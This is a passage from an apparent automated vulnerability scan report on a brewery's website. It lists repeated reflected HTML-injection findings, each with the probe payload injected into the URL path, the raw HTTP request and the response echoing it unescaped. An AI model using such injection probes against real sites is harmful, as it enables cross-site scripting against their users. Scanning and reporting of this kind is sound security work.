<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<base href="http://www.n
...[SNIP]...
<body id="brewerycaf8b"><a>2b307023ca2_page" class="brewerycaf8b">
...[SNIP]...

1.18. http://www.ninkasibrewing.com/brewery/content/css/print.css [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.ninkasibrewing.com
Path:	/brewery/content/css/print.css

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2c630"><a>4b43cdb9ffe was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /brewery2c630"><a>4b43cdb9ffe/content/css/print.css HTTP/1.1
Host: www.ninkasibrewing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=4o33ishep9gqp223c2cg8e5jf1;

Response

HTTP/1.1 200 OK
Date: Sun, 21 Nov 2010 21:49:14 GMT
Server: Apache
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 13214

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<base href="http://www.n
...[SNIP]...
<body id="brewery2c630"><a>4b43cdb9ffe_page" class="brewery2c630">
...[SNIP]...

1.19. http://www.ninkasibrewing.com/brewery/content/js/basic.js [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.ninkasibrewing.com
Path:	/brewery/content/js/basic.js

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8bd1a"><a>7a2e695ff2 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /brewery8bd1a"><a>7a2e695ff2/content/js/basic.js HTTP/1.1
Host: www.ninkasibrewing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=4o33ishep9gqp223c2cg8e5jf1;

Response

HTTP/1.1 200 OK
Date: Sun, 21 Nov 2010 21:49:13 GMT
Server: Apache
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 13212

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<base href="http://www.n
...[SNIP]...
<body id="brewery8bd1a"><a>7a2e695ff2_page" class="brewery8bd1a">
...[SNIP]...

1.20. http://www.ninkasibrewing.com/brewery/content/js/combined.css [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.ninkasibrewing.com
Path:	/brewery/content/js/combined.css

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 78fa0"><a>dd60fcefdd7 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /brewery78fa0"><a>dd60fcefdd7/content/js/combined.css HTTP/1.1
Host: www.ninkasibrewing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=4o33ishep9gqp223c2cg8e5jf1;

Response

HTTP/1.1 200 OK
Date: Sun, 21 Nov 2010 21:49:14 GMT
Server: Apache
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 13214

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<base href="http://www.n
...[SNIP]...
<body id="brewery78fa0"><a>dd60fcefdd7_page" class="brewery78fa0">
...[SNIP]...

1.21. http://www.ninkasibrewing.com/brewery/content/js/combined.js [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.ninkasibrewing.com
Path:	/brewery/content/js/combined.js

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1a328"><a>58cb21c931b was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /brewery1a328"><a>58cb21c931b/content/js/combined.js HTTP/1.1
Host: www.ninkasibrewing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=4o33ishep9gqp223c2cg8e5jf1;

Response

HTTP/1.1 200 OK
Date: Sun, 21 Nov 2010 21:49:10 GMT
Server: Apache
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 13214

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<base href="http://www.n
...[SNIP]...
<body id="brewery1a328"><a>58cb21c931b_page" class="brewery1a328">
...[SNIP]...

1.22. http://www.ninkasibrewing.com/careers/ [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.ninkasibrewing.com
Path:	/careers/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bebf4"><a>6ff175caf2b was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /careersbebf4"><a>6ff175caf2b/ HTTP/1.1
Host: www.ninkasibrewing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.ninkasibrewing.com/
Cookie: PHPSESSID=lgog9cm9mfbve3sk8vts9buej4;

Response

HTTP/1.1 200 OK
Date: Sun, 21 Nov 2010 21:44:34 GMT
Server: Apache
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 13214

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<base href="http://www.n
...[SNIP]...
<body id="careersbebf4"><a>6ff175caf2b_page" class="careersbebf4">
...[SNIP]...

1.23. http://www.ninkasibrewing.com/careers/content/css/basic.css [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.ninkasibrewing.com
Path:	/careers/content/css/basic.css

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload becda"><a>fd1c2df5815 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /careersbecda"><a>fd1c2df5815/content/css/basic.css HTTP/1.1
Host: www.ninkasibrewing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=4o33ishep9gqp223c2cg8e5jf1;

Response

HTTP/1.1 200 OK
Date: Sun, 21 Nov 2010 21:49:19 GMT
Server: Apache
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 13214

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<base href="http://www.n
...[SNIP]...
<body id="careersbecda"><a>fd1c2df5815_page" class="careersbecda">
...[SNIP]...

1.24. http://www.ninkasibrewing.com/careers/content/css/ninkasi.css [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.ninkasibrewing.com
Path:	/careers/content/css/ninkasi.css

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fd34a"><a>b8b6cd26d1a was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /careersfd34a"><a>b8b6cd26d1a/content/css/ninkasi.css HTTP/1.1
Host: www.ninkasibrewing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=4o33ishep9gqp223c2cg8e5jf1;

Response

HTTP/1.1 200 OK
Date: Sun, 21 Nov 2010 21:49:20 GMT
Server: Apache
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 13214

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<base href="http://www.n
...[SNIP]...
<body id="careersfd34a"><a>b8b6cd26d1a_page" class="careersfd34a">
...[SNIP]...

1.25. http://www.ninkasibrewing.com/careers/content/css/print.css [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.ninkasibrewing.com
Path:	/careers/content/css/print.css

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b4b5f"><a>54c1eee5e30 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /careersb4b5f"><a>54c1eee5e30/content/css/print.css HTTP/1.1
Host: www.ninkasibrewing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=4o33ishep9gqp223c2cg8e5jf1;

Response

HTTP/1.1 200 OK
Date: Sun, 21 Nov 2010 21:49:18 GMT
Server: Apache
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 13214

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<base href="http://www.n
...[SNIP]...
<body id="careersb4b5f"><a>54c1eee5e30_page" class="careersb4b5f">
...[SNIP]...

1.26. http://www.ninkasibrewing.com/careers/content/js/basic.js [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.ninkasibrewing.com
Path:	/careers/content/js/basic.js

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d9ea2"><a>efc19015908 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /careersd9ea2"><a>efc19015908/content/js/basic.js HTTP/1.1
Host: www.ninkasibrewing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=4o33ishep9gqp223c2cg8e5jf1;

Response

HTTP/1.1 200 OK
Date: Sun, 21 Nov 2010 21:49:24 GMT
Server: Apache
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 13214

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<base href="http://www.n
...[SNIP]...
<body id="careersd9ea2"><a>efc19015908_page" class="careersd9ea2">
...[SNIP]...

1.27. http://www.ninkasibrewing.com/careers/content/js/combined.css [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.ninkasibrewing.com
Path:	/careers/content/js/combined.css

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ea81e"><a>7759b9fb197 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /careersea81e"><a>7759b9fb197/content/js/combined.css HTTP/1.1
Host: www.ninkasibrewing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=4o33ishep9gqp223c2cg8e5jf1;

Response

HTTP/1.1 200 OK
Date: Sun, 21 Nov 2010 21:49:27 GMT
Server: Apache
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 13214

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<base href="http://www.n
...[SNIP]...
<body id="careersea81e"><a>7759b9fb197_page" class="careersea81e">
...[SNIP]...

1.28. http://www.ninkasibrewing.com/careers/content/js/combined.js [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.ninkasibrewing.com
Path:	/careers/content/js/combined.js

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e87c5"><a>07d9d56d600 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /careerse87c5"><a>07d9d56d600/content/js/combined.js HTTP/1.1
Host: www.ninkasibrewing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=4o33ishep9gqp223c2cg8e5jf1;

Response

HTTP/1.1 200 OK
Date: Sun, 21 Nov 2010 21:49:53 GMT
Server: Apache
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 13214

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<base href="http://www.n
...[SNIP]...
<body id="careerse87c5"><a>07d9d56d600_page" class="careerse87c5">
...[SNIP]...

1.29. http://www.ninkasibrewing.com/company/ [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.ninkasibrewing.com
Path:	/company/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 806cc"><a>6e5127e8258 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /company806cc"><a>6e5127e8258/ HTTP/1.1
Host: www.ninkasibrewing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.ninkasibrewing.com/
Cookie: PHPSESSID=lgog9cm9mfbve3sk8vts9buej4;

Response

HTTP/1.1 200 OK
Date: Sun, 21 Nov 2010 21:44:34 GMT
Server: Apache
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 13214

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<base href="http://www.n
...[SNIP]...
<body id="company806cc"><a>6e5127e8258_page" class="company806cc">
...[SNIP]...

1.30. http://www.ninkasibrewing.com/company/content/css/basic.css [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.ninkasibrewing.com
Path:	/company/content/css/basic.css

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d1ab6"><a>2f1540286bf was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /companyd1ab6"><a>2f1540286bf/content/css/basic.css HTTP/1.1
Host: www.ninkasibrewing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=4o33ishep9gqp223c2cg8e5jf1;

Response

HTTP/1.1 200 OK
Date: Sun, 21 Nov 2010 21:50:02 GMT
Server: Apache
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 13214

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<base href="http://www.n
...[SNIP]...
<body id="companyd1ab6"><a>2f1540286bf_page" class="companyd1ab6">
...[SNIP]...

1.31. http://www.ninkasibrewing.com/company/content/css/ninkasi.css [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.ninkasibrewing.com
Path:	/company/content/css/ninkasi.css

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e706a"><a>c8816d8ff3f was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /companye706a"><a>c8816d8ff3f/content/css/ninkasi.css HTTP/1.1
Host: www.ninkasibrewing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=4o33ishep9gqp223c2cg8e5jf1;

Response

HTTP/1.1 200 OK
Date: Sun, 21 Nov 2010 21:49:58 GMT
Server: Apache
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 13214

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<base href="http://www.n
...[SNIP]...
<body id="companye706a"><a>c8816d8ff3f_page" class="companye706a">
...[SNIP]...

1.32. http://www.ninkasibrewing.com/company/content/css/print.css [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.ninkasibrewing.com
Path:	/company/content/css/print.css

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5c8fc"><a>5627c06183b was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /company5c8fc"><a>5627c06183b/content/css/print.css HTTP/1.1
Host: www.ninkasibrewing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=4o33ishep9gqp223c2cg8e5jf1;

Response

HTTP/1.1 200 OK
Date: Sun, 21 Nov 2010 21:49:27 GMT
Server: Apache
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 13214

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<base href="http://www.n
...[SNIP]...
<body id="company5c8fc"><a>5627c06183b_page" class="company5c8fc">
...[SNIP]...

1.33. http://www.ninkasibrewing.com/company/content/js/basic.js [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.ninkasibrewing.com
Path:	/company/content/js/basic.js

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7ca1b"><a>883628057d0 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /company7ca1b"><a>883628057d0/content/js/basic.js HTTP/1.1
Host: www.ninkasibrewing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=4o33ishep9gqp223c2cg8e5jf1;

Response

HTTP/1.1 200 OK
Date: Sun, 21 Nov 2010 21:49:28 GMT
Server: Apache
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 13214

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<base href="http://www.n
...[SNIP]...
<body id="company7ca1b"><a>883628057d0_page" class="company7ca1b">
...[SNIP]...

1.34. http://www.ninkasibrewing.com/company/content/js/combined.css [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.ninkasibrewing.com
Path:	/company/content/js/combined.css

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f15af"><a>10c219e5d62 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /companyf15af"><a>10c219e5d62/content/js/combined.css HTTP/1.1
Host: www.ninkasibrewing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=4o33ishep9gqp223c2cg8e5jf1;

Response

HTTP/1.1 200 OK
Date: Sun, 21 Nov 2010 21:49:27 GMT
Server: Apache
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 13214

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<base href="http://www.n
...[SNIP]...
<body id="companyf15af"><a>10c219e5d62_page" class="companyf15af">
...[SNIP]...

1.35. http://www.ninkasibrewing.com/company/content/js/combined.js [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.ninkasibrewing.com
Path:	/company/content/js/combined.js

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 95cc6"><a>4a3776524c8 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /company95cc6"><a>4a3776524c8/content/js/combined.js HTTP/1.1
Host: www.ninkasibrewing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=4o33ishep9gqp223c2cg8e5jf1;

Response

HTTP/1.1 200 OK
Date: Sun, 21 Nov 2010 21:50:11 GMT
Server: Apache
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 13214

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<base href="http://www.n
